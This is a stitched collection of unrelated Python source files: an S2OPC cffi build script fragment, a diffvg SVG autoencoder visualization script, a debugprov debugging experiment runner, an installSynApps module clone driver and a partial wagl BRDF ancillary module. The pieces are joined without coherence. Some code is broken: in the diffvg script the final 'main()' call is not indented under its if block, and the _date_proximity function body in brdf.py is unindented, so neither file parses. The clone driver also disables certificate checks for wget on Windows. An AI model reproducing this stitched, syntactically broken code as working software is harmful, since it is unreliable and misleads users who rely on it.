                          extra_link_args=['Advapi32.lib', 'ws2_32.lib', 's2opc_clientserver-xml-loaders-expat.lib', 's2opc_clientwrapper.lib', 's2opc_clientserver.lib', 's2opc_common.lib', 'mbedcrypto.lib', 'mbedtls.lib', 'mbedx509.lib', 'libexpat.lib'],
                          include_dirs=['.'],
                          library_dirs=['../lib',  # working dir should be located in build dir
                                        '.'],  # Ease compilation outside of the S2OPC project
                          )
else:
    # Linux: link with -l flags against the same libraries.
    ffibuilder.set_source('_pys2opc',
                          source,
                          extra_link_args=['-ls2opc_clientserver-xml-loaders-expat', '-ls2opc_clientwrapper', '-ls2opc_clientserver', '-ls2opc_common', '-lmbedcrypto', '-lmbedtls', '-lmbedx509', '-lexpat'],
                          include_dirs=['.'],
                          library_dirs=['../lib',  # working dir should be located in build dir
                                        '.'],  # Ease compilation outside of the S2OPC project
                          )

if __name__ == '__main__':
    # Build the _pys2opc extension module into ./out.
    ffibuilder.compile(tmpdir='out')
|
<reponame>13952522076/diffvg
"""
CUDA_VISIBLE_DEVICES=0 python visualize.py --model ResNetAE --msg demo1 --image ../data/emoji_rgb/train/0/240px-Emoji_u1f60d.svg.png
"""
import argparse
import os
import datetime
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
from torchvision import transforms
import models as models
from PIL import Image
from helper import mkdir_p
def parse_args():
    """Parameters"""
    parser = argparse.ArgumentParser('training')
    # Checkpoint handling.
    parser.add_argument('-c', '--checkpoint', type=str, metavar='PATH',
                        help='path to save checkpoint (default: checkpoint)')
    parser.add_argument('--msg', type=str, help='message after checkpoint')
    parser.add_argument('--model', default='RealAE', help='model name [default: pointnet_cls]')
    parser.add_argument('--image', type=str, help='the test image')
    parser.add_argument('--which', type=str, default="best", choices=["best", "last", "none"])
    # training
    parser.add_argument('--loss', default='l2')
    # models
    # imsize = 28, paths = 4, segments = 5, samples = 2, zdim = 1024, stroke_width = None
    parser.add_argument('--imsize', default=224, type=int)
    parser.add_argument('--paths', default=128, type=int)
    parser.add_argument('--segments', default=3, type=int)
    parser.add_argument('--samples', default=2, type=int)
    parser.add_argument('--zdim', default=2048, type=int)
    parser.add_argument('--max_width', default=2, type=int)
    # NOTE(review): 'pretained' is a typo for 'pretrained', but the flag name
    # is part of the CLI/attribute interface (used as args.pretained_encoder
    # elsewhere), so it is kept for compatibility.
    parser.add_argument('--pretained_encoder', dest='pretained_encoder', action='store_true')
    return parser.parse_args()
# Module-level setup: parse CLI args and derive checkpoint/output folders.
args = parse_args()
os.environ["HDF5_USE_FILE_LOCKING"] = "FALSE"
# Verbose operations: make folder, init logger, fix seed, set device
time_str = str(datetime.datetime.now().strftime('-%Y%m%d%H%M%S'))
# Folder suffix: timestamp when --msg is absent, otherwise the message.
message = time_str if args.msg is None else "-" + args.msg
args.checkpoint = 'checkpoints/' + args.model + message
args.visualize = 'checkpoints/' + args.model + message + '/test'
if not os.path.isdir(args.visualize):
    mkdir_p(args.visualize)
def main():
    """Build the model, load the requested checkpoint, run one image through
    it and save the input/SVG/render visualizations next to the checkpoint."""
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    print(f'==> using device: {device}')
    print(f"==> args: {args}")
    # building models
    print(f'==> Building model: {args.model}')
    net = models.__dict__[args.model](
        imsize=args.imsize, paths=args.paths, segments=args.segments, samples=args.samples,
        zdim=args.zdim, pretained_encoder=args.pretained_encoder)
    if args.loss == 'l1':
        criterion = nn.L1Loss().to(device)
        print(f"==> Using criterion L1 loss.")
    else:
        criterion = nn.MSELoss().to(device)
        print(f"==> Using criterion MSE loss.")
    net = net.to(device)
    if device == 'cuda':
        net = torch.nn.DataParallel(net)
        cudnn.benchmark = True
    if args.which == "none":
        print("!!! Loading no checkpoint, the output is random.!!!")
    else:
        which_checkpoint = args.which + "_checkpoint.pth"
        print(f"==> loading {which_checkpoint} from {args.checkpoint}")
        # BUG FIX: this previously hard-coded "last_checkpoint.pth", so
        # --which best silently loaded the last checkpoint instead of the
        # announced one; honor the requested checkpoint name.
        checkpoint_path = os.path.join(args.checkpoint, which_checkpoint)
        checkpoint = torch.load(checkpoint_path)
        net.load_state_dict(checkpoint['net'])
    print('==> Preparing data..')
    test_transform = transforms.Compose([
        transforms.Resize((args.imsize, args.imsize)),
        transforms.ToTensor()
    ])
    data = Image.open(args.image)
    data = test_transform(data)
    data.unsqueeze_(0)  # add the batch dimension
    data = data.to(device)
    net.eval()
    # Derive the output-file stem from the input image name.
    basename = os.path.basename(args.image)
    filename = os.path.splitext(basename)[0]
    print(f"basename is {basename}, filename is {filename}")
    with torch.no_grad():
        out = net(data)
        loss = criterion(data, out)
        loss = str("%.6f" % (loss))
        # Embed the reconstruction loss in the output filenames.
        inputpath = os.path.join(args.visualize, f"{filename}_input.png")
        svgpath = os.path.join(args.visualize, f"{filename}_loss{loss}_svg.svg")
        renderpath = os.path.join(args.visualize, f"{filename}_loss{loss}_render.png")
        # NOTE(review): net.module only exists when DataParallel wrapped the
        # model (CUDA path); on CPU this line would fail — confirm CPU use.
        net.module.visualize(data, inputpath=inputpath, svgpath=svgpath, renderpath=renderpath)
    print(f"Finish visualization.")
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# coding: utf-8
# Experiment Configs
from debugprov.validity import Validity
from debugprov.divide_and_query import DivideAndQuery
from debugprov.single_stepping import SingleStepping
from debugprov.visualization import Visualization
from debugprov.heaviest_first import HeaviestFirst
from debugprov.top_down import TopDown
from debugprov.execution_tree_creator import ExecTreeCreator
from debugprov.provenance_enhancement import ProvenanceEnhancement
from debugprov.node import Node
from datetime import datetime
from graphviz import Graph
import time
import sqlite3
# Master switches for the experiment runs below.
GENERATE_TREES = False       # when True, also render each execution tree with graphviz
RUN_1ST_EXPERIMENT = True    # navigation strategies without provenance
RUN_2ND_EXPERIMENT = False   # provenance prune, without asking which output is wrong
RUN_3RD_EXPERIMENT = True    # provenance prune, asking which output is wrong
# Debugging subjects: buggy program mutants captured with noWorkflow.
# Each directory is expected to contain .noworkflow/db.sqlite and an
# answers.json oracle (see paths built inside the loop below).
subjects = [
    'experiments/selected_mutants/bisection.mutant.19', # 02-bisection
    'experiments/selected_mutants/bisection.mutant.108', # 02-bisection
    'experiments/selected_mutants/intersection.mutant.81', # 03-intersection
    'experiments/selected_mutants/lu_decomposition.mutant.84', # 04-lu_decomposition
    'experiments/selected_mutants/newton_method.mutant.35', # 05-newton_method
    'experiments/selected_mutants/basic_binary_tree.mutant.56', # 07-basic_binary_tree
    # Skipping 08-edit_distance
    # Skipping 09-dijkstra_algorithm
    # Skipping 10-caesar_cipher
    # Skipping 11-caesar_cipher
    # 'experiments/selected_mutants/basic_maths.mutant.117', stuck in infinite loop
    'experiments/selected_mutants/merge_sort.mutant.3', # 13-merge_sort
    # 'experiments/selected_mutants/math_parser.mutant.213', # 16-math_parser
    'experiments/selected_mutants/merge_intervals.mutant.206', # 17-merge_intervals
    'experiments/selected_mutants/binary_search.mutant.15',
    # 'experiments/selected_mutants/permute.mutant.119', # 20-permute
    'experiments/selected_mutants/lcs.mutant.101', # 21-longest_common_subsequence
    'experiments/selected_mutants/lis.mutant.88', # 23-longest_increasing_subsequence
    #'experiments/selected_mutants/heapsort.mutant.151',
    #'experiments/selected_mutants/quicksort.mutant.5'
]
for subject in subjects:
    print(datetime.now().strftime('%Y_%m_%d %H-%M-%S.%f'))
    print("Subject: "+subject)
    NOW2_SQLITE_PATH = "{}/.noworkflow/db.sqlite".format(subject)
    ANSWER_FILE_PATH = "{}/answers.json".format(subject)
    # NOTE(review): the sqlite connection is never closed; fine for a one-shot
    # experiment script, but worth confirming if this is reused elsewhere.
    CURSOR = sqlite3.connect(NOW2_SQLITE_PATH).cursor()
    creator = ExecTreeCreator(CURSOR)
    #################################
    # FIRST EXPERIMENT
    # COMPARING NAVIGATION STRATEGIES WITHOUT PROVENANCE
    navs = [SingleStepping, TopDown, HeaviestFirst, DivideAndQuery]
    if RUN_1ST_EXPERIMENT:
        for nav in navs:
            exec_tree = None
            # Rebuild the execution tree for every strategy so runs are independent.
            exec_tree = creator.create_exec_tree()
            nav_instance = nav(exec_tree, True, ANSWER_FILE_PATH)
            nav_instance.navigate()
            print(nav_instance.__class__.__name__+" experiment finished: " +
                  str(nav_instance.sequence_num)+" steps.")
            if GENERATE_TREES:
                vis = Visualization(exec_tree)
                vis.view_exec_tree(str(id(exec_tree)))
    #################################
    # SECOND EXPERIMENT
    # COMPARING NAVIGATION STRATEGIES WITH PROVENANCE PRUNE, BUT WITHOUT ASKING WHICH OUTPUT DATA IS WRONG
    navs = [SingleStepping, TopDown, HeaviestFirst, DivideAndQuery]
    if RUN_2ND_EXPERIMENT:
        for nav in navs:
            exec_tree = None
            exec_tree = creator.create_exec_tree()
            # Enhance the whole tree with provenance before pruning.
            prov = ProvenanceEnhancement(exec_tree, CURSOR)
            prov.enhance_all()
            nav_instance = nav(exec_tree, True, ANSWER_FILE_PATH)
            nav_instance.provenance_prune()
            nav_instance.navigate()
            print(nav_instance.__class__.__name__+" experiment finished: " +
                  str(nav_instance.sequence_num)+" steps.")
            if GENERATE_TREES:
                vis = Visualization(exec_tree)
                vis.view_exec_tree(str(id(exec_tree)))
    #################################
    # THIRD EXPERIMENT
    # COMPARING NAVIGATION STRATEGIES WITH PROVENANCE PRUNE, ASKING WHICH OUTPUT DATA IS WRONG
    navs = [SingleStepping, TopDown, HeaviestFirst, DivideAndQuery]
    if RUN_3RD_EXPERIMENT:
        for nav in navs:
            exec_tree = None
            exec_tree = creator.create_exec_tree()
            nav_instance = nav(exec_tree, True, ANSWER_FILE_PATH)
            prov = ProvenanceEnhancement(exec_tree, CURSOR)
            # wrong_node_id is presumably loaded from the answers file by the
            # navigator -- TODO confirm against the nav implementation.
            wrong_node_ev = exec_tree.search_by_ev_id(
                nav_instance.wrong_node_id)
            prov.enhance(wrong_node_ev)
            nav_instance.provenance_prune()
            nav_instance.navigate()
            print(nav_instance.__class__.__name__+" experiment finished: " +
                  str(nav_instance.sequence_num)+" steps.")
            if GENERATE_TREES:
                vis = Visualization(exec_tree)
                vis.view_exec_tree(str(id(exec_tree)))
|
"""Driver class for cloning all of the install modules
The clone driver uses git, wget, tar and zip to download all modules specified in install configuration
to the local machine.
"""
import os
from subprocess import Popen, PIPE
import shutil
from sys import platform
import installSynApps.DataModel.install_config as IC
import installSynApps.DataModel.install_module as IM
import installSynApps.IO.logger as LOG
class CloneDriver:
    """Class responsible for cloning and checking out all of the modules described in a given InstallConfiguration

    Attributes
    ----------
    recursive_modules : List of str
        list of module names that need to be cloned recursively
    submodule_list : List of str
        list of module names that have submodules that must be initialized
    submodule_names : Dict of str -> str
        pairings of module names to submodules that must be initialized
    install_config : InstallConfiguration
        contains all necessary install configuration information including list of modules

    Methods
    -------
    clone_module(module : InstallModule, recursive=False)
        Function responsible for cloning each module into the appropriate location
    checkout_module(module : InstallModule)
        Function that checks out module's tag version if non-master version is specified
    update_submodule(module : InstallModule, submodule_name : str)
        Function that initializes and updates one submodule of a cloned repo
    cleanup_modules()
        Function that removes any module directories that exist but are not required
    clone_and_checkout()
        Top level function that calls the other functions on each module in self.install_config.get_module_list()
    """

    def __init__(self, install_config):
        """Constructor for the CloneDriver class

        Parameters
        ----------
        install_config : InstallConfiguration
            install configuration whose modules will be cloned/checked out
        """
        self.recursive_modules = ["EPICS_BASE"]
        self.submodule_list = []
        self.submodule_names = {}
        self.install_config = install_config

    def clone_module(self, module, recursive=False):
        """Function responsible for cloning each module into the appropriate location

        First checks if the module uses git or a download, and whether it needs to be
        recursive, then uses the information in the module object along with subprocess
        commands to clone (and, for downloads, unpack) the module.

        Parameters
        ----------
        module : InstallModule
            InstallModule currently being cloned
        recursive : bool
            Flag that decides if git clone should be done recursively

        Returns
        -------
        int
            0 on success, -1 if the clone/unpack failed or the URL type is
            unsupported, -2 if the module has no absolute path, -3 if the
            input is not an InstallModule
        """
        LOG.debug('Cloning module {}'.format(module.name))
        if isinstance(module, IM.InstallModule):
            if module.abs_path is not None:
                ret = -1
                # Start from a clean target directory so stale checkouts never
                # mix with the fresh clone/download.
                if os.path.exists(module.abs_path):
                    shutil.rmtree(module.abs_path)
                command = None
                if module.url_type == "GIT_URL":
                    if recursive:
                        command = "git clone --recursive {} {}".format(module.url + module.repository, module.abs_path)
                    else:
                        command = "git clone {} {}".format(module.url + module.repository, module.abs_path)
                elif module.url_type == "WGET_URL":
                    if platform == "win32":
                        command = "wget --no-check-certificate -P {} {}".format(module.abs_path, module.url + module.repository)
                    else:
                        command = 'wget -P {} {}'.format(module.abs_path, module.url + module.repository)
                if command is None:
                    # Previously an unknown url_type crashed with an unbound
                    # 'command'; fail cleanly instead.
                    LOG.write('Unsupported URL type {} for module {}.'.format(module.url_type, module.name))
                    return -1
                LOG.print_command(command)
                proc = Popen(command.split(' '))
                proc.wait()
                ret = proc.returncode
                if ret == 0:
                    LOG.write('Cloned module {} successfully.'.format(module.name))
                else:
                    LOG.write('Failed to clone module {}.'.format(module.name))
                    return -1
                if module.url_type == "WGET_URL":
                    # Downloads may be archives that still need unpacking.
                    command = None
                    if (module.repository.endswith(".tar.gz") or module.repository.endswith(".tgz")) and ret == 0:
                        command = "tar -xzf {} -C {} --strip-components=1".format(os.path.join(module.abs_path, module.repository), module.abs_path)
                    elif module.repository.endswith(".zip") and ret == 0:
                        # BUG FIX: unzip selects the output directory with -d;
                        # -C only toggles case-insensitive name matching.
                        command = "unzip {} -d {}".format(os.path.join(module.abs_path, module.repository), module.abs_path)
                    # BUG FIX: only run an unpack command when one was actually
                    # built; previously a non-archive download re-ran the stale
                    # wget command a second time.
                    if command is not None:
                        LOG.print_command(command)
                        proc = Popen(command.split(' '))
                        proc.wait()
                        ret = proc.returncode
                        if ret == 0:
                            LOG.write('Unpacked module {} successfully.'.format(module.name))
                        else:
                            LOG.write('Failed to unpack module {}.'.format(module.name))
                if ret == 0:
                    return ret
                return -1
            return -2
        return -3

    def checkout_module(self, module):
        """Function responsible for checking out selected tagged versions of modules.

        Parameters
        ----------
        module : InstallModule
            Module that is being checked out

        Returns
        -------
        int
            -1 if the input was not a valid InstallModule with a known path,
            0 on success or when no checkout is required, otherwise the
            'git checkout' return code
        """
        ret = -1
        LOG.debug('Checking out version for module {}'.format(module.name))
        if isinstance(module, IM.InstallModule):
            if module.abs_path is not None:
                ret = 0
                # Only git repos pinned to a non-master version need a checkout.
                if module.version != "master" and module.url_type == "GIT_URL":
                    current_loc = os.getcwd()
                    os.chdir(module.abs_path)
                    command = "git checkout -q {}".format(module.version)
                    LOG.print_command(command)
                    proc = Popen(command.split(' '))
                    proc.wait()
                    ret = proc.returncode
                    # Always restore the original working directory.
                    os.chdir(current_loc)
                if ret == 0:
                    LOG.write('Checked out version {}'.format(module.version))
                else:
                    LOG.write('Checkout of version {} failed for module {}.'.format(module.version, module.name))
        return ret

    def update_submodule(self, module, submodule_name):
        """Function that updates submodules given that the input module is in the self.submodule_list array

        Parameters
        ----------
        module : InstallModule
            module for which we must update submodules
        submodule_name : str
            name of submodule to update
        """
        LOG.debug('Updating git submodules for {}'.format(module.name))
        if isinstance(module, IM.InstallModule):
            if module.abs_path is not None:
                submodule_path = module.abs_path + "/" + submodule_name
                if os.path.exists(submodule_path):
                    LOG.print_command('git -C {} submodule init'.format(submodule_path))
                    p1 = Popen(["git", "-C", submodule_path, "submodule", "init"])
                    p1.wait()
                    if p1.returncode == 0:
                        LOG.debug('Submodules initialized for module {}.'.format(module.name))
                    else:
                        LOG.debug('Failed to initialize submodules for module {}.'.format(module.name))
                    LOG.print_command('git -C {} submodule update'.format(submodule_path))
                    p2 = Popen(["git", "-C", submodule_path, "submodule", "update"])
                    p2.wait()
                    if p2.returncode == 0:
                        LOG.debug('Submodules updated for module {}.'.format(module.name))
                    else:
                        LOG.debug('Failed to update submodules for module {}.'.format(module.name))

    def cleanup_modules(self):
        """Function responsible for cleaning up directories that were not selected to clone
        """
        # isinstance() already rejects None, so the explicit None check was redundant.
        if isinstance(self.install_config, IC.InstallConfiguration):
            for module in self.install_config.modules:
                if isinstance(module, IM.InstallModule):
                    # Guard abs_path so os.path.exists never receives None.
                    if module.clone == "NO" and module.abs_path is not None and os.path.exists(module.abs_path):
                        LOG.debug('Removing unused repo {}'.format(module.name))
                        shutil.rmtree(module.abs_path)

    def clone_and_checkout(self):
        """Top level function that clones and checks out all modules in the current install configuration.

        Returns
        -------
        List of str or None
            List of all modules that failed to be correctly cloned and checked
            out, or None if the install configuration is invalid
        """
        if isinstance(self.install_config, IC.InstallConfiguration):
            failed_modules = []
            for module in self.install_config.get_module_list():
                if module.clone == "YES":
                    ret = 0
                    if module.name in self.recursive_modules:
                        ret = self.clone_module(module, recursive=True)
                    else:
                        ret = self.clone_module(module)
                    if ret < 0:
                        failed_modules.append(module.name)
                    else:
                        ret = self.checkout_module(module)
                        if ret < 0:
                            failed_modules.append(module.name)
                        else:
                            if module.name in self.submodule_list:
                                self.update_submodule(module, self.submodule_names[module.name])
            self.cleanup_modules()
            return failed_modules
        return None
|
<reponame>Oceancolour-RG/wagl<filename>wagl/brdf.py<gh_stars>0
#!/usr/bin/env python
"""
BRDF data extraction utilities
------------------------------
The :ref:`nbar-algorithm-label` and :ref:`tc-algorithm-label` algorithms
require estimates of various atmospheric parameters, which are produced using
`MODTRAN <http://modtran5.com/>`_. MODTRAN, in turn, requires `BRDF
<http://en.wikipedia.org/wiki/Bidirectional_reflectance_distribution_function>`_
estimates. The estimates used in the ULA, are based on `MODIS
<http://modis.gsfc.nasa.gov/>`_ and are produced by CSIRO. For more
information, on how these are used, see :download:`this
<auxiliary/li_etal_2010_05422912.pdf>`.
`MODIS <http://modis.gsfc.nasa.gov/>`_, pre Feb 2001, MODIS data was not
available and an alternative method of deriving `BRDF
<http://en.wikipedia.org/wiki/Bidirectional_reflectance_distribution_function>`_
estimates is required.
"""
from __future__ import absolute_import, print_function
import datetime
import logging
import os
from os.path import join as pjoin
import numpy as np
import rasterio
from rasterio.features import rasterize
from rasterio.crs import CRS
import pyproj
import h5py
from osgeo import ogr
import shapely
import shapely.affinity
import shapely.geometry
from shapely.geometry import box
from shapely import wkt, ops
from wagl.constants import BrdfDirectionalParameters, BrdfModelParameters, BrdfTier
from wagl.hdf5 import H5CompressionFilter, VLEN_STRING
from wagl.metadata import current_h5_metadata
from wagl.data import read_subset
_LOG = logging.getLogger(__name__)
# Accurate BRDF requires both Terra and Aqua to be operating
# Aqua launched 2002-05-04, so we'll add a buffer for determining the start
# date for using definitive data; scenes before this fall back to the
# pre-MODIS ancillary (see get_brdf_data).
DEFINITIVE_START_DATE: datetime.date = datetime.datetime(2002, 7, 1).date()
class BRDFLoaderError(Exception):
    """
    BRDF Loader Error.

    Module-specific exception for failures while loading BRDF ancillary data.
    """
class BRDFLookupError(Exception):
    """
    BRDF Lookup Error.

    Module-specific exception for failures while locating BRDF ancillary data.
    """
def _date_proximity(cmp_date, date_interpreter=lambda x: x):
"""_date_proximity providers a comparator for an interable
with an interpreter function. Used to find the closest item
in a list.
If two dates are equidistant return the most recent.
:param cmp_date: date to compare list against
:param date_interprater: function applied to the list to
transform items into dates
"""
def _proximity_comparator(date):
_date = date_interpreter(date)
return (
abs(_date - cmp_date),
-1 * _date.year,
-1 * _date.month,
-1 * _date.day
)
return _proximity_comparator
def get_brdf_dirs_modis(brdf_root, scene_date, pattern='%Y.%m.%d'):
    """
    Get the MODIS BRDF directory closest in time to the scene date.

    :param brdf_root:
        BRDF root directory.
    :type brdf_root:
        :py:class:`str`
    :param scene_date:
        Scene Date.
    :type scene_date:
        :py:class:`datetime.date`
    :param pattern:
        A string handed to strptime to interpret directory names into
        observation dates for the brdf ancillary.
    :type pattern:
        :py:class:`str`
    :return:
        A string containing the closest matching BRDF directory.
    """
    observed_dates = []
    for entry in sorted(os.listdir(brdf_root)):
        try:
            observed_dates.append(datetime.datetime.strptime(entry, pattern).date())
        except ValueError:
            # Directory name does not follow the date pattern; not a BRDF dir.
            continue
    closest = min(observed_dates, key=_date_proximity(scene_date))
    return closest.strftime(pattern)
def get_brdf_dirs_fallback(brdf_root, scene_date):
    """
    Get the pre-MODIS (fallback) BRDF directory closest to the scene date.

    :param brdf_root:
        BRDF root directory.
    :type brdf_root:
        :py:class:`str`
    :param scene_date:
        Scene Date.
    :type scene_date:
        :py:class:`datetime.date`
    :return:
        A string containing the closest matching BRDF directory.
    """
    # Fallback BRDF directories are named by day-of-year ('XXX').
    # Pair each day-of-year with the scene year, then pad with one entry from
    # the previous year (last DOY) and one from the next year (first DOY) so
    # scenes near a year boundary still find their nearest neighbour.
    doys = sorted(os.listdir(brdf_root), key=lambda name: name.zfill(3))
    dir_dates = [(str(scene_date.year), doy) for doy in doys]
    dir_dates.insert(0, (str(scene_date.year - 1), dir_dates[-1][1]))
    # dir_dates[1] is the first in-year entry after the insert above
    dir_dates.append((str(scene_date.year + 1), dir_dates[1][1]))

    def as_date(pair):
        return datetime.datetime.strptime(' '.join(pair), '%Y %j').date()

    # Return only the directory name (day-of-year), without the year.
    return min(dir_dates, key=_date_proximity(scene_date, as_date))[1]
def coord_transformer(src_crs, dst_crs):
    """
    Coordinate transformation function between CRSs.

    :param src_crs:
        Source CRS.
    :type src_crs:
        :py:class:`rasterio.crs.CRS`
    :param dst_crs:
        Destination CRS.
    :type dst_crs:
        :py:class:`rasterio.crs.CRS`
    :return:
        A function that takes a point in the source CRS and returns the same
        point expressed in the destination CRS.
    """
    def _as_proj(crs):
        return pyproj.Proj(**crs.to_dict())

    # Proj objects are built lazily on each call, mirroring the original
    # error-timing behaviour for invalid CRS inputs.
    def _transform(*args, **kwargs):
        return pyproj.transform(_as_proj(src_crs), _as_proj(dst_crs), *args, **kwargs)

    return _transform
class BrdfTileSummary:
    """
    A lightweight accumulator for the BRDF information gathered from a tile.

    Holds per-parameter ``{'sum': ..., 'count': ...}`` tallies plus the ids of
    the source files that contributed to them; instances combine with ``+``.
    """

    def __init__(self, brdf_summaries, source_files):
        # per-BrdfModelParameters tallies: {'sum': float, 'count': int}
        self.brdf_summaries = brdf_summaries
        # ids of the datasets that contributed to the tallies
        self.source_files = source_files

    @staticmethod
    def empty():
        """Summary for a tile that does not intersect the region of interest."""
        zeros = {}
        for param in BrdfModelParameters:
            zeros[param] = {'sum': 0.0, 'count': 0}
        return BrdfTileSummary(zeros, [])

    def __add__(self, other):
        """Accumulate information from different tiles."""
        combined = {}
        for param in BrdfModelParameters:
            mine = self.brdf_summaries[param]
            theirs = other.brdf_summaries[param]
            combined[param] = {'sum': mine['sum'] + theirs['sum'],
                               'count': mine['count'] + theirs['count']}
        return BrdfTileSummary(combined, self.source_files + other.source_files)

    def mean(self):
        """Calculate the mean BRDF parameters (ratio of spatial averages)."""
        if not any(self.brdf_summaries[param]['count'] for param in BrdfModelParameters):
            # possibly over the ocean, so lambertian
            return {param: dict(id=self.source_files, value=0.0)
                    for param in BrdfDirectionalParameters}
        averages = {}
        for param in BrdfModelParameters:
            tally = self.brdf_summaries[param]
            averages[param] = tally['sum'] / tally['count']
        numerator = {BrdfDirectionalParameters.ALPHA_1: BrdfModelParameters.VOL,
                     BrdfDirectionalParameters.ALPHA_2: BrdfModelParameters.GEO}
        return {param: dict(id=self.source_files,
                            value=averages[numerator[param]] / averages[BrdfModelParameters.ISO])
                for param in BrdfDirectionalParameters}
def valid_region(acquisition, mask_value=None):
    """
    Return valid data region for input images based on mask value and input image path

    :param acquisition:
        Acquisition object providing `data()` and `gridded_geo_box()`.
    :param mask_value:
        Pixel value treated as nodata. Defaults to the acquisition's
        `no_data` value; if that is also None, zero-valued pixels are masked.
    :return:
        Tuple of (shapely geometry of the valid region in CRS coordinates,
        the CRS as a dict).
    """
    img = acquisition.data()
    gbox = acquisition.gridded_geo_box()
    crs = CRS.from_wkt(gbox.crs.ExportToWkt()).to_dict()
    transform = gbox.transform.to_gdal()
    if mask_value is None:
        mask_value = acquisition.no_data
    if mask_value is not None:
        mask = img != mask_value
    else:
        mask = img != 0
    # Vectorize the valid-data mask into polygons and union them into one shape.
    shapes = rasterio.features.shapes(mask.astype('uint8'), mask=mask)
    shape = ops.unary_union([shapely.geometry.shape(shape) for shape, val in shapes if val == 1])
    # convex hull
    geom = shape.convex_hull
    # buffer by 1 pixel
    geom = geom.buffer(1, join_style=3, cap_style=3)
    # simplify with 1 pixel radius
    geom = geom.simplify(1)
    # intersect with image bounding box
    geom = geom.intersection(shapely.geometry.box(0, 0, mask.shape[1], mask.shape[0]))
    # transform from pixel space into CRS space
    # (shapely expects (a, b, d, e, xoff, yoff); GDAL supplies
    # (xoff, a, b, yoff, d, e), hence the index reordering below)
    geom = shapely.affinity.affine_transform(
        geom, (transform[1], transform[2], transform[4],
               transform[5], transform[0], transform[3])
    )
    return geom, crs
def load_brdf_tile(src_poly, src_crs, fid, dataset_name, fid_mask):
    """
    Summarize BRDF data from a single tile.

    :param src_poly: region-of-interest polygon in `src_crs` coordinates
    :param src_crs: CRS of `src_poly`
    :param fid: open h5py file holding the BRDF tile
    :param dataset_name: name of the BRDF dataset inside `fid`
    :param fid_mask: open rasterio dataset with the ocean mask (land=1, ocean=0)
    :return: a BrdfTileSummary of per-parameter sums/counts inside the ROI;
        an empty summary when the tile does not intersect the ROI or the mask
    """
    ds = fid[dataset_name]

    # Densify the polygon boundary so it stays accurate after reprojection.
    def segmentize_src_poly(length_scale):
        src_poly_geom = ogr.CreateGeometryFromWkt(src_poly.wkt)
        src_poly_geom.Segmentize(length_scale)
        return wkt.loads(src_poly_geom.ExportToWkt())

    ds_height, ds_width = ds.shape
    dst_geotransform = rasterio.transform.Affine.from_gdal(*ds.attrs['geotransform'])
    dst_crs = CRS.from_wkt(ds.attrs['crs_wkt'])
    # assumes the length scales are the same (m)
    dst_poly = ops.transform(coord_transformer(src_crs, dst_crs),
                             segmentize_src_poly(np.sqrt(np.abs(dst_geotransform.determinant))))
    # Tile footprint in destination CRS coordinates.
    bound_poly = ops.transform(lambda x, y: dst_geotransform * (x, y), box(0., 0., ds_width, ds_height, ccw=False))
    if not bound_poly.intersects(dst_poly):
        return BrdfTileSummary.empty()
    ocean_poly = ops.transform(lambda x, y: fid_mask.transform * (x, y), box(0., 0., fid_mask.width, fid_mask.height))
    if not ocean_poly.intersects(dst_poly):
        return BrdfTileSummary.empty()
    # read ocean mask file for correspoing tile window
    # land=1, ocean=0
    bound_poly_coords = list(bound_poly.exterior.coords)[:4]
    ocean_mask, _ = read_subset(fid_mask, *bound_poly_coords)
    ocean_mask = ocean_mask.astype(bool)
    # inside=1, outside=0
    roi_mask = rasterize([(dst_poly, 1)], fill=0, out_shape=(ds_height, ds_width), transform=dst_geotransform)
    roi_mask = roi_mask.astype(bool)
    # both ocean_mask and mask shape should be same
    if ocean_mask.shape != roi_mask.shape:
        raise ValueError('ocean mask and ROI mask do not have the same shape')
    if roi_mask.shape != ds.shape:
        raise ValueError('BRDF dataset and ROI mask do not have the same shape')
    # Restrict the ROI to land pixels only.
    roi_mask = roi_mask & ocean_mask

    def layer_sum(param):
        # Sum valid, unscaled-then-rescaled values of one BRDF layer over the ROI.
        layer = ds[param][:, :]
        common_mask = roi_mask & (layer != ds.attrs['_FillValue'])
        layer = layer.astype('float32')
        layer[~common_mask] = np.nan
        layer = ds.attrs['scale_factor'] * (layer - ds.attrs['add_offset'])
        return {'sum': np.nansum(layer), 'count': np.sum(common_mask)}

    return BrdfTileSummary({param: layer_sum(param.value) for param in BrdfModelParameters},
                           [current_h5_metadata(fid)['id']])
def get_brdf_data(acquisition, brdf,
                  compression=H5CompressionFilter.LZF, filter_opts=None):
    """
    Calculates the mean BRDF value for the given acquisition,
    for each BRDF parameter ['geo', 'iso', 'vol'] that covers
    the acquisition's extents.

    :param acquisition:
        An instance of an acquisitions object.

    :param brdf:
        A `dict` defined as either of the following:

        * {'user': {<band-alias>: {'iso': <value>, 'vol': <value>, 'geo': <value>}, ...}}
        * {'brdf_path': <path-to-BRDF>, 'brdf_fallback_path': <path-to-average-BRDF>,
           'ocean_mask_path': <path-to-ocean-mask>}

        Here <path-to-BRDF> is a string containing the full file system
        path to your directory containing the source BRDF files
        The BRDF directories are assumed to be yyyy.mm.dd naming convention.

        <path-to-average-BRDF> is a string containing the full file system
        path to your directory containing the fallback BRDF data.
        To be used for pre-MODIS and potentially post-MODIS acquisitions.

        And <path-to-ocean-mask> is a string containing the full file system path
        to your ocean mask file. To be used for masking ocean pixels from BRDF data
        all acquisitions.

    :param compression:
        The compression filter to use.
        Default is H5CompressionFilter.LZF

    :filter_opts:
        A dict of key value pairs available to the given configuration
        instance of H5CompressionFilter. For example
        H5CompressionFilter.LZF has the keywords *chunks* and *shuffle*
        available.
        Default is None, which will use the default settings for the
        chosen H5CompressionFilter instance.

    :return:
        A `dict` with the keys:

        * BrdfDirectionalParameters.ALPHA_1
        * BrdfDirectionalParameters.ALPHA_2

        Values for each BRDF Parameter are accessed via the key named
        `value`.

    :notes:
        The keywords compression and filter_opts aren't used as we no
        longer save the BRDF imagery. However, we may need to store
        tables in future, therefore they can remain until we know
        for sure they'll never be used.
    """
    if 'user' in brdf:
        # user-specified override: skip all file lookups entirely
        return {param: dict(data_source='BRDF', tier=BrdfTier.USER.name,
                            value=brdf['user'][acquisition.alias][param.value.lower()])
                for param in BrdfDirectionalParameters}

    brdf_primary_path = brdf['brdf_path']
    brdf_secondary_path = brdf['brdf_fallback_path']
    brdf_ocean_mask_path = brdf['ocean_mask_path']
    # Get the date of acquisition
    dt = acquisition.acquisition_datetime.date()
    # Compare the scene date and MODIS BRDF start date to select the
    # BRDF data root directory.
    # Scene dates outside this range are to use the fallback data
